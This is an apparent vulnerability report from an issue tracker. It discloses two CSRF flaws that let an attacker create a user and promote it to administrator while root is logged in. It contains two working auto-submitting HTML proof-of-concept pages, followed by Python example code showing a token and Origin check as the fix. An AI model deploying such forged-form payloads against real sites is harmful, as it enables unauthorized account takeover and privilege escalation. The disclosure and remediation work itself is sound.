Two CSRF vulnerabilities that can create a new user and Promote it to Administrator privileges #6

Description

@Li-Siyuan

When the super administrator (root) is logged in, there are 2 important POST methods without CSRF protection that can create a new user and promote it to administrator privileges. This can be achieved by tricking the super administrator into opening the 2 pages while he is logged in.

```html
<!--poc1.html (Create a new user)-->
<!DOCTYPE html>
<html>
  <head>
  <title>CSRF Proof Of Concept - Create a new user</title>
  <script type="text/javascript">
    // Auto-submit the hidden form as soon as the page loads; the victim's
    // session cookie is attached by the browser automatically.
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/root_create_user" method="POST">
      <input type="hidden" name="username" value="hacker" />
      <input type="hidden" name="password" value="hacker" />
      <input type="hidden" name="realname" value="hacker" />
      <input type="hidden" name="email" value="" />
    </form>
  </body>
</html>
```

```html
<!--poc2.html (Promote a user to Administrator privileges)-->
<!DOCTYPE html>
<html>
  <head>
  <title>CSRF Proof Of Concept - update a user to admin</title>
  <script type="text/javascript">
    // Same auto-submit trick; "id" is the target user created by poc1.html.
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/update_admin_info" method="POST">
      <input type="hidden" name="id" value="7" />
      <input type="hidden" name="check" value="false" />
    </form>
  </body>
</html>
```
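The fix the report implies is a per-session anti-CSRF token on both endpoints. The following is an added example, not code from this issue or from the project it concerns: it models the two POST handlers in plain Python with the vulnerable form (session cookie only) beside a hardened form that also requires a synchronizer token and checks the `Origin` header. The endpoint paths, form field names and `http://localhost` origin come from the PoCs above; the in-memory session and user stores, the function names, the `csrf_token` field name and the assumption that `update_admin_info` sets the admin flag of the posted `id` are all constructed for illustration.

```python
import hmac
import secrets

# Constructed in-memory stores standing in for the application's database and
# session storage (assumed; the report does not describe the backend).
SESSIONS: dict = {}                       # sid -> {"user": str, "csrf": str}
USERS: dict = {1: {"username": "root", "admin": True}}
SITE_ORIGIN = "http://localhost"          # origin of the form actions in the PoC


def login(user: str) -> str:
    """Start a session and mint a per-session CSRF token; the token has to be
    rendered as a hidden field in every legitimate state-changing form."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    return SESSIONS[sid]["csrf"]


def make_request(sid: str, form: dict, origin: str) -> dict:
    """Model of an incoming POST. The cookie travels with any cross-site form
    submission, which is exactly what poc1.html and poc2.html rely on."""
    return {"cookies": {"sid": sid}, "form": dict(form), "headers": {"Origin": origin}}


def _root_session(req: dict):
    sess = SESSIONS.get(req["cookies"].get("sid"))
    return sess if sess and sess["user"] == "root" else None


def _csrf_ok(req: dict, sess: dict) -> bool:
    """Synchronizer-token check plus an Origin check. compare_digest keeps the
    comparison constant-time; a token minted for another session never matches.
    A missing Origin is tolerated (some clients omit it), a foreign one is not."""
    token = req["form"].get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return False
    origin = req["headers"].get("Origin")
    return origin is None or origin == SITE_ORIGIN


def _create_user(form: dict) -> int:
    uid = max(USERS) + 1
    USERS[uid] = {"username": form["username"], "admin": False}
    return uid


def vulnerable_root_create_user(req: dict) -> int:
    """Before: only the session cookie is checked, so poc1.html succeeds."""
    if _root_session(req) is None:
        return 403
    _create_user(req["form"])
    return 200


def hardened_root_create_user(req: dict) -> int:
    """After: same authorization, plus the CSRF check."""
    sess = _root_session(req)
    if sess is None or not _csrf_ok(req, sess):
        return 403
    _create_user(req["form"])
    return 200


def hardened_update_admin_info(req: dict) -> int:
    """After: promotion also requires the token. The report does not say what
    the "check" field means; the endpoint is modelled here as granting admin
    to the user whose id is posted (assumption)."""
    sess = _root_session(req)
    if sess is None or not _csrf_ok(req, sess):
        return 403
    try:
        uid = int(req["form"].get("id", ""))
    except ValueError:
        return 400
    if uid not in USERS:
        return 404
    USERS[uid]["admin"] = True
    return 200


def is_admin(username: str) -> bool:
    return any(u["username"] == username and u["admin"] for u in USERS.values())
```

Because the token lives in the session rather than in a cookie, a cross-site page cannot read it, so the forged POST in the PoCs fails the `compare_digest` check even though the victim's cookie is sent. The `Origin` check is a second, independent signal and should not replace the token.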
